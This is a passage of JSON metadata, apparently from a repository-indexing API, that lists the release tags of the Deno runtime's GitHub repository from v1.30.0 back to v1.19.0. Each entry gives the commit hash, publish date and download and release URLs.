/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0"